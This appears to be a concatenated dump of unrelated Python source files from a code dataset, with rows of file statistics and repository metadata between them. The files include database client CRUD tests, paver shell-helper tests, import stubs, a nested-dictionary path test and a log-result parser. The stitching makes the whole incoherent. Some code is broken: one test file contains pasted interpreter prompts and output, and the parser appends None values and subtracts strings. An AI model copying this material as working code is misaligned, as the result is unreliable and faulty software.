# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for manipulating Client via the DB API"""
import copy
from freezer_api.tests.unit import common
from freezer_api.tests.unit.sqlalchemy import base
class DbClientTestCase(base.DbTestCase):
    """Exercises the client CRUD and search operations of the sqlalchemy DB API."""

    def setUp(self):
        # Pull a canned client document and derive the ids the DB API needs.
        super(DbClientTestCase, self).setUp()
        self.fake_client_0 = common.get_fake_client_0()
        self.fake_client_doc = self.fake_client_0.get('client')
        self.fake_user_id = self.fake_client_0.get('user_id')
        self.fake_project_id = self.fake_client_doc.get('project_id')

    def test_add_and_get_client(self):
        """A stored client can be fetched back with matching fields."""
        client_doc = copy.deepcopy(self.fake_client_doc)
        client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                          doc=client_doc,
                                          project_id=self.fake_project_id)
        self.assertIsNotNone(client_id)
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       client_id=client_id)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0].get('user_id'),
                         self.fake_user_id)
        client = result[0].get('client')
        self.assertEqual(client.get('client_id'),
                         self.fake_client_doc.get('client_id'))
        self.assertEqual(client.get('description'),
                         self.fake_client_doc.get('description'))

    def test_add_and_delete_client(self):
        """Deleting a client returns its id and removes it from lookups."""
        client_doc = copy.deepcopy(self.fake_client_doc)
        client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                          doc=client_doc,
                                          project_id=self.fake_project_id)
        self.assertIsNotNone(client_id)
        result = self.dbapi.delete_client(project_id=self.fake_project_id,
                                          user_id=self.fake_user_id,
                                          client_id=client_id)
        self.assertIsNotNone(result)
        self.assertEqual(result, client_id)
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       client_id=client_id)
        self.assertEqual(len(result), 0)

    def test_add_and_search_client(self):
        """Paged get_client honors limit/offset and preserves insertion order."""
        count = 0
        clientids = []
        # Insert 20 clients, each with a fresh client_id.
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=10,
                                       offset=0)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 10)
        for index in range(len(result)):
            clientmap = result[index]
            clientid = clientmap['client'].get('client_id')
            self.assertEqual(clientids[index], clientid)

    def test_add_and_search_client_with_search_match_and_match_not(self):
        """Combined match / match_not filters select only the intersection."""
        count = 0
        clientids = []
        # 5 clients get description "tecs"; of those, 2 (indexes 4 and 12)
        # also get hostname "node2" and must be excluded by match_not.
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['description'] = "tecs"
            if count in [4, 12]:
                client_doc['hostname'] = 'node2'
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        search_opt = {'match_not': [{'hostname': 'node2'}],
                      'match': [{'description': 'tecs'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 3)
        for index in range(len(result)):
            clientmap = result[index]
            hostname = clientmap['client'].get('hostname')
            description = clientmap['client'].get('description')
            self.assertEqual('node1', hostname)
            self.assertEqual('tecs', description)

    def test_add_and_search_client_with_search_match_list(self):
        """Multiple match entries are ANDed together."""
        count = 0
        clientids = []
        # Only indexes 4 and 12 have both hostname "node2" and description "tecs".
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['description'] = "tecs"
            if count in [4, 12]:
                client_doc['hostname'] = 'node2'
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        search_opt = {'match': [{'hostname': 'node2'},
                                {'description': 'tecs'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 2)
        for index in range(len(result)):
            clientmap = result[index]
            hostname = clientmap['client'].get('hostname')
            description = clientmap['client'].get('description')
            self.assertEqual('node2', hostname)
            self.assertEqual('tecs', description)

    def test_add_and_search_client_with_search_match_not_list(self):
        """Multiple match_not entries each exclude their matching rows."""
        count = 0
        clientids = []
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['description'] = "tecs"
            if count in [4, 12]:
                client_doc['hostname'] = 'node2'
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        search_opt = {'match_not': [{'hostname': 'node2'},
                                    {'description': 'some usefule text here'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 3)
        for index in range(len(result)):
            clientmap = result[index]
            hostname = clientmap['client'].get('hostname')
            description = clientmap['client'].get('description')
            self.assertEqual('node1', hostname)
            self.assertEqual('tecs', description)

    def test_add_and_search_client_with_all_opt_one_match(self):
        """The '_all' search option accepts a JSON list with one criterion."""
        count = 0
        clientids = []
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['description'] = "tecs"
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        search_opt = {'match': [{'_all': '[{"description": "tecs"}]'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 5)
        for index in range(len(result)):
            clientmap = result[index]
            description = clientmap['client'].get('description')
            self.assertEqual('tecs', description)

    def test_add_and_search_client_with_all_opt_two_match(self):
        """The '_all' search option ANDs two criteria given in one JSON list."""
        count = 0
        clientids = []
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['hostname'] = "node2"
            if count in [4, 12]:
                client_doc['description'] = "tecs"
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        search_opt = {'match':
                      [{'_all':
                        '[{"description": "tecs"}, '
                        '{"hostname": "node2"}]'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 2)
        for index in range(len(result)):
            clientmap = result[index]
            description = clientmap['client'].get('description')
            hostname = clientmap['client'].get('hostname')
            self.assertEqual('tecs', description)
            self.assertEqual('node2', hostname)

    def test_add_and_search_client_with_error_all_opt_return_alltuples(self):
        """A malformed '_all' value is ignored and all rows are returned."""
        count = 0
        clientids = []
        while (count < 20):
            client_doc = copy.deepcopy(self.fake_client_doc)
            clientid = common.get_fake_client_id()
            client_doc['client_id'] = clientid
            client_doc['hostname'] = "node1"
            if count in [0, 4, 8, 12, 16]:
                client_doc['hostname'] = "node2"
            client_id = self.dbapi.add_client(user_id=self.fake_user_id,
                                              doc=client_doc,
                                              project_id=self.fake_project_id)
            self.assertIsNotNone(client_id)
            self.assertEqual(clientid, client_id)
            clientids.append(client_id)
            count += 1
        # Not a JSON list (bare object): treated as invalid, filter dropped.
        search_opt = {'match': [{'_all': '{"hostname": "node2"}'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 20)
        # Not JSON at all: likewise ignored.
        search_opt = {'match': [{'_all': 'hostname=node2'}]}
        result = self.dbapi.get_client(project_id=self.fake_project_id,
                                       user_id=self.fake_user_id,
                                       limit=20,
                                       offset=0,
                                       search=search_opt)
        self.assertIsNotNone(result)
        self.assertEqual(len(result), 20)
| 41.139535
| 79
| 0.524096
| 1,466
| 14,152
| 4.797408
| 0.095498
| 0.063984
| 0.063984
| 0.045784
| 0.861937
| 0.820845
| 0.80691
| 0.789137
| 0.789137
| 0.777193
| 0
| 0.01759
| 0.38136
| 14,152
| 343
| 80
| 41.259475
| 0.785722
| 0.046142
| 0
| 0.816479
| 0
| 0
| 0.06135
| 0
| 0
| 0
| 0
| 0
| 0.187266
| 1
| 0.037453
| false
| 0
| 0.011236
| 0
| 0.052434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc15e8b406827fc522c5723a965cf0f3f8e618e8
| 44
|
py
|
Python
|
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | null | null | null |
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | null | null | null |
src/reverse/reverse/__init__.py
|
fugue/zim-example
|
861b197ddc1074375bb9437b3282ab3e517b9019
|
[
"MIT"
] | 2
|
2021-03-17T03:02:52.000Z
|
2021-07-21T23:31:08.000Z
|
from reverse.handler import reverse_handler
| 22
| 43
| 0.886364
| 6
| 44
| 6.333333
| 0.666667
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 44
| 1
| 44
| 44
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc1e92d97151874bb5edb5eb6ea6e3b315df6745
| 118
|
py
|
Python
|
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | null | null | null |
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | 12
|
2022-01-18T06:21:03.000Z
|
2022-01-20T07:29:56.000Z
|
PDSUtilities/xgboost/__init__.py
|
DrJohnWagner/PDSUtilities
|
ffad1a02f78f46acdf4bd65d7c2eb063af7dbc13
|
[
"Apache-2.0"
] | null | null | null |
from PDSUtilities.xgboost.plot_tree import plot_tree
from PDSUtilities.xgboost.plot_importance import plot_importance
| 39.333333
| 64
| 0.898305
| 16
| 118
| 6.375
| 0.4375
| 0.313725
| 0.45098
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 65
| 59
| 0.927273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
04134593c149d7f0dbe9b04b47969b6588140d4b
| 2,396
|
py
|
Python
|
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | 1
|
2015-02-09T19:59:44.000Z
|
2015-02-09T19:59:44.000Z
|
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | null | null | null |
paver/tests/test_easy.py
|
jrossi/paver
|
db4ea25ed1c986c766fd3424aeae34d9b28ac937
|
[
"BSD-3-Clause"
] | null | null | null |
from paver import easy
from paver.tests.mock import patch, Mock
import subprocess # for easy.sh tests
@patch(subprocess, "Popen")
@patch(easy, "error")
def test_sh_raises_BuildFailure(popen, error):
    """easy.sh raises BuildFailure on a nonzero exit code and logs stderr via easy.error."""
    # Arrange: Popen reports failure (returncode 1) with some stderr text.
    popen.return_value = Mock()
    popen.return_value.returncode = 1
    popen.return_value.stderr.read.return_value = 'some stderr'
    try:
        easy.sh('foo')
    except easy.BuildFailure, e:  # Python 2 except syntax (file predates py3)
        args = e.args
        assert args == ('Subprocess return code: 1', )
    else:
        assert False, 'Failed to raise BuildFailure'
    assert popen.called
    assert popen.call_args[0][0] == 'foo'
    assert popen.call_args[1]['shell'] == True
    # Without capture=True, stdout must not be redirected.
    assert 'stdout' not in popen.call_args[1]
    assert error.called
    assert error.call_args == (('some stderr', ), {})
@patch(subprocess, "Popen")
def test_sh_with_capture_raises_BuildFailure(popen):
    """easy.sh(capture=True) still raises BuildFailure on failure, with stdout/stderr piped."""
    # Arrange: Popen reports failure (returncode 1) with some stderr text.
    popen.return_value = Mock()
    popen.return_value.returncode = 1
    popen.return_value.stderr.read.return_value = 'some stderr'
    try:
        easy.sh('foo', capture=True)
    except easy.BuildFailure, e:  # Python 2 except syntax (file predates py3)
        args = e.args
        assert args == ('Subprocess return code: 1', )
    else:
        assert False, 'Failed to raise BuildFailure'
    assert popen.called
    assert popen.call_args[0][0] == 'foo'
    assert popen.call_args[1]['shell'] == True
    # capture=True pipes both streams so the caller receives the output.
    assert popen.call_args[1]['stdout'] == subprocess.PIPE
    assert popen.call_args[1]['stderr'] == subprocess.PIPE
@patch(subprocess, "Popen")
def test_sh_ignores_error(popen):
    """easy.sh(ignore_error=True) swallows a nonzero subprocess exit code."""
    failed_process = Mock()
    failed_process.returncode = 1
    failed_process.stderr.read.return_value = 'some stderr'
    popen.return_value = failed_process
    easy.sh('foo', ignore_error=True)
    assert popen.called
    call_positional = popen.call_args[0]
    call_keywords = popen.call_args[1]
    assert call_positional[0] == 'foo'
    assert call_keywords['shell'] == True
    # stdout is left alone; only stderr is piped for the error report.
    assert 'stdout' not in call_keywords
    assert call_keywords['stderr'] == subprocess.PIPE
@patch(subprocess, "Popen")
def test_sh_ignores_error_with_capture(popen):
    """capture=True combined with ignore_error=True: output piped, failure ignored."""
    failed_process = Mock()
    failed_process.returncode = 1
    failed_process.stderr.read.return_value = 'some stderr'
    popen.return_value = failed_process
    easy.sh('foo', capture=True, ignore_error=True)
    assert popen.called
    call_positional = popen.call_args[0]
    call_keywords = popen.call_args[1]
    assert call_positional[0] == 'foo'
    assert call_keywords['shell'] == True
    # capture=True pipes both streams.
    assert call_keywords['stdout'] == subprocess.PIPE
    assert call_keywords['stderr'] == subprocess.PIPE
| 32.378378
| 63
| 0.681553
| 330
| 2,396
| 4.79697
| 0.145455
| 0.11813
| 0.123184
| 0.156033
| 0.852811
| 0.838913
| 0.820594
| 0.820594
| 0.820594
| 0.820594
| 0
| 0.012814
| 0.185726
| 2,396
| 73
| 64
| 32.821918
| 0.798565
| 0.007095
| 0
| 0.770492
| 0
| 0
| 0.11443
| 0
| 0
| 0
| 0
| 0
| 0.409836
| 0
| null | null | 0
| 0.04918
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
043b2ea525bd81b7fc943a348f887ae96d009796
| 110
|
py
|
Python
|
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | 1
|
2015-09-18T16:23:03.000Z
|
2015-09-18T16:23:03.000Z
|
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | null | null | null |
lattice/tasks/__init__.py
|
siq/lattice
|
0824981eb829704240d1e088cf414f1cc5487ede
|
[
"Linux-OpenIB"
] | null | null | null |
import lattice.tasks.component
import lattice.tasks.profile
import lattice.tasks.deb
import lattice.tasks.rpm
| 22
| 30
| 0.854545
| 16
| 110
| 5.875
| 0.4375
| 0.553191
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 4
| 31
| 27.5
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f09e3d4e935bf95bf7cbbba0ff1d6a54a90c0205
| 3,989
|
py
|
Python
|
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
TEST/dict_func.tst.py
|
ihgazni2/nvdict
|
d439f6ae409a3d5da13edaa968ff726274209cf4
|
[
"MIT"
] | null | null | null |
d = {
'open':{
'conn':'open.conn',
'auth': {
'challenge':'open.auth.challenge',
'answer':'open.auth.answer',
'succ':'open.auth.succ',
'fail':'open.auth.fail'
}
},
'keepalive':{
'ping':"keepalive.ping",
'pong':"keepalive.pong",
},
'signal':{
'room':{
'join':'signal.room.join',
'leave':'signal.room.leave',
},
'channel':{
'join':'signal.channel.join',
'leave':'signal.channel.leave',
},
},
'data':'data',
'close':'close'
}
from xdict.jprint import pobj
>>> pobj(get_via_pl(d,['open']))
{
'conn': 'open.conn',
'auth':
{
'challenge': 'open.auth.challenge',
'answer': 'open.auth.answer',
'succ': 'open.auth.succ',
'fail': 'open.auth.fail'
}
}
>>> pobj(get_via_pl(d,['open','auth']))
{
'challenge': 'open.auth.challenge',
'answer': 'open.auth.answer',
'succ': 'open.auth.succ',
'fail': 'open.auth.fail'
}
>>> get_via_pl(d,['open','auth','challenge'])
'open.auth.challenge'
>>>
dd = {}
set_dflt_via_pl(dd,['open','conn'])
set_dflt_via_pl(dd,['open','auth','challenge'])
set_dflt_via_pl(dd,['open','auth','answer'])
set_dflt_via_pl(dd,['open','auth','succ'])
set_dflt_via_pl(dd,['open','auth','fail'])
set_dflt_via_pl(dd,['keepalive','ping'])
set_dflt_via_pl(dd,['keepalive','pong'])
set_dflt_via_pl(dd,['signal','room','join'])
set_dflt_via_pl(dd,['signal','room','leave'])
set_dflt_via_pl(dd,['signal','channel','join'])
set_dflt_via_pl(dd,['signal','channel','leave'])
set_dflt_via_pl(dd,['data'])
set_dflt_via_pl(dd,['close'])
set_via_pl(dd,['open','conn'],'open.conn')
set_via_pl(dd,['open','auth','challenge'],'open.auth.challenge')
set_via_pl(dd,['open','auth','answer'],'open.auth.answer')
set_via_pl(dd,['open','auth','succ'],'open.auth.succ')
set_via_pl(dd,['open','auth','fail'],'open.auth.fail')
set_via_pl(dd,['keepalive','ping'],'keepalive.ping')
set_via_pl(dd,['keepalive','pong'],'keepalive.pong')
set_via_pl(dd,['signal','room','join'],'signal.room.join')
set_via_pl(dd,['signal','room','leave'],'signal.room.leave')
set_via_pl(dd,['signal','channel','join'],'signal.channel.join')
set_via_pl(dd,['signal','channel','leave'],'signal.channel.leave')
set_via_pl(dd,['data'],'data')
set_via_pl(dd,['close'],'close')
assert(dd==d)
dd = {}
set_dflt_via_pl(dd,['open','conn'],'open.conn')
set_dflt_via_pl(dd,['open','auth','challenge'],'open.auth.challenge')
set_dflt_via_pl(dd,['open','auth','answer'],'open.auth.answer')
set_dflt_via_pl(dd,['open','auth','succ'],'open.auth.succ')
set_dflt_via_pl(dd,['open','auth','fail'],'open.auth.fail')
set_dflt_via_pl(dd,['keepalive','ping'],'keepalive.ping')
set_dflt_via_pl(dd,['keepalive','pong'],'keepalive.pong')
set_dflt_via_pl(dd,['signal','room','join'],'signal.room.join')
set_dflt_via_pl(dd,['signal','room','leave'],'signal.room.leave')
set_dflt_via_pl(dd,['signal','channel','join'],'signal.channel.join')
set_dflt_via_pl(dd,['signal','channel','leave'],'signal.channel.leave')
set_dflt_via_pl(dd,['data'],'data')
set_dflt_via_pl(dd,['close'],'close')
assert(dd==d)
del_via_pl(d,['data'])
del_via_pl(d,['open','auth'])
{'challenge': 'open.auth.challenge', 'answer': 'open.auth.answer', 'succ': 'open.auth.succ', 'fail': 'open.auth.fail'}
>>> pobj(d)
{
'open':
{
'conn': 'open.conn'
},
'keepalive':
{
'ping': 'keepalive.ping',
'pong': 'keepalive.pong'
},
'signal':
{
'room':
{
'join': 'signal.room.join',
'leave': 'signal.room.leave'
},
'channel':
{
'join': 'signal.channel.join',
'leave': 'signal.channel.leave'
}
},
'close': 'close'
}
| 28.091549
| 118
| 0.566057
| 527
| 3,989
| 4.068311
| 0.058824
| 0.102612
| 0.127332
| 0.145522
| 0.967817
| 0.958489
| 0.944496
| 0.930504
| 0.841884
| 0.801306
| 0
| 0
| 0.18927
| 3,989
| 141
| 119
| 28.29078
| 0.662956
| 0
| 0
| 0.198347
| 0
| 0
| 0.411189
| 0
| 0
| 0
| 0
| 0
| 0.016529
| 0
| null | null | 0
| 0.008264
| null | null | 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0b63186e476cb72adaa3401fd5290b7fa72cc87
| 7,271
|
py
|
Python
|
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | 1
|
2020-06-25T02:14:27.000Z
|
2020-06-25T02:14:27.000Z
|
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | null | null | null |
result_parser.py
|
ninima0323/TestGUI
|
f6e01c98c410996e4b7663b0ee65cf0d192a10e3
|
[
"MIT"
] | null | null | null |
import os
def isValidRange(val):
    """Return True if val lies strictly between 0 and 65279 (both exclusive).

    The comparison itself already yields a bool, so the former
    if/return-True/else/return-False scaffolding was redundant.
    """
    return 0 < val < 65279
# Tolerances used by analyze_result when grading command/read pairs.
PADDING_FOR_TIME = 0.2   # max allowed (interval - transition time) slack; presumably seconds — TODO confirm unit
PADDING_FOR_VALUE = 50   # max allowed |output value - input value| distance
def analyze_result(log_path):
    """Parse a semicolon-delimited task log and grade each command/read pair.

    Skips the header line, then pairs each COMMAND_TASK record with the most
    recently seen READ_ATTRIBUTE_TASK record. Depending on the command kind
    (COLOR_CTRL / LVL_CTRL / ON_OFF) it appends either "OK" or an error
    message to both records and collects them into the returned list.

    NOTE(review): a COMMAND_TASK record is evaluated in the same loop
    iteration it is read, so a READ_ATTRIBUTE_TASK record must appear
    *before* it in the log or ``line_read[5]`` raises IndexError — TODO
    confirm the expected log ordering.

    :param log_path: path to the log file; each record is ';'-separated with
                     the task kind in field 1 — TODO confirm full schema.
    :return: list of graded records (see BUG note below for the OK branch).
    """
    with open(log_path, 'r') as f:
        lines = f.readlines()[1:]  # drop the header line
    result_list = []
    line_read = []
    line_command = []
    for line in lines:
        origin_line = line.split('\n')[0]  # unused; kept as-is
        # Strip the trailing newline, then split the record into fields.
        line = line.split('\n')[0].split(';')
        if line[1] == "COMMAND_TASK":
            line_command = line
        elif line[1] == "READ_ATTRIBUTE_TASK":
            line_read = line
        # Grade as soon as we hold a command record (see ordering NOTE above).
        if line_command != []:
            if 'COLOR_CTRL' == line_command[2]: # color ctrl
                input_cmd = line_command[3]  # unused; kept as-is
                # Field 4 looks like "0x<val>,<?>,0x<dur>"; [2:] strips "0x".
                input_val = int(line_command[4].split(',')[0][2:])
                input_duration = float(line_command[4].split(',')[2][2:]) * 0.1
                interval = float(line_command[5])
                output_val = int(line_read[5])
                if input_val == output_val : # OK
                    # BUG(review): list.append() returns None, so these two
                    # statements append None to result_list instead of the
                    # records (compare the LVL_CTRL branch below, which
                    # appends the lists themselves).
                    result_list.append(line_command.append("OK"))
                    result_list.append(line_read.append("OK"))
                else:
                    if interval > input_duration: # enough to transit color or temperature to the target point
                        if (interval - input_duration) <= PADDING_FOR_TIME:
                            e = "Error : The interval value may be short compared to the transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                        elif (abs(output_val - input_val) <= PADDING_FOR_VALUE):
                            e = "Error : The distance between the input value and the output value is too far for the given transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                        # NOTE(review): when neither tolerance matches,
                        # nothing is recorded for this pair.
                    else: # short to transit color or temperature to the target point
                        e = "Error : The interval value may be short compared to the transition time."
                        line_command.append(e)
                        line_read.append(e)
                        result_list.append(line_command)
                        result_list.append(line_read)
            elif 'LVL_CTRL' == line_command[2]: # level ctrl (original comment said "color ctrl" — copy-paste)
                input_cmd = line_command[3]  # unused; kept as-is
                input_val = int(line_command[4].split(',')[0][2:])
                input_duration = float(line_command[4].split(',')[2][2:]) * 0.1
                interval = float(line_command[5])
                output_val = int(line_read[5])
                if input_val == output_val : # OK
                    line_command.append("OK")
                    line_read.append("OK")
                    result_list.append(line_command)
                    result_list.append(line_read)
                else:
                    if interval > input_duration: # enough to transit color or temperature to the target point
                        if (interval - input_duration) <= PADDING_FOR_TIME:
                            e = "Error : The interval value may be short compared to the transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                        elif (abs(output_val - input_val) <= PADDING_FOR_VALUE): # change to abs(previous output - current input)
                            e= "Error : The distance between the input value and the output value is too far for the given transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                    else: # short to transit color or temperature to the target point
                        e = "Error : The interval value may be short compared to the transition time."
                        line_command.append(e)
                        line_read.append(e)
                        result_list.append(line_command)
                        result_list.append(line_read)
            elif 'ON_OFF' == line_command[2]:
                input_cmd = line_command[3]
                input_val = "True" if input_cmd == "ON" else "False"
                input_duration = 0.1
                interval = float(line_command[5])
                output_val = line_read[5]
                if input_val == output_val : # OK
                    line_command.append("OK")
                    line_read.append("OK")
                    result_list.append(line_command)
                    result_list.append(line_read)
                else:
                    if interval > input_duration: # enough to transit color or temperature to the target point
                        if (interval - input_duration) <= PADDING_FOR_TIME:
                            e = "Error : The interval value may be short compared to the transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                        # BUG(review): here input_val and output_val are the
                        # strings "True"/"False", so this subtraction raises
                        # TypeError if this branch is ever reached.
                        elif (abs(output_val - input_val) <= PADDING_FOR_VALUE):
                            e = "Error : The distance between the input value and the output value is too far for the given transition time."
                            line_command.append(e)
                            line_read.append(e)
                            result_list.append(line_command)
                            result_list.append(line_read)
                    else: # short to transit color or temperature to the target point
                        e = "Error : The interval value may be short compared to the transition time."
                        line_command.append(e)
                        line_read.append(e)
                        result_list.append(line_command)
                        result_list.append(line_read)
    return result_list
| 60.090909
| 150
| 0.450419
| 707
| 7,271
| 4.420085
| 0.118812
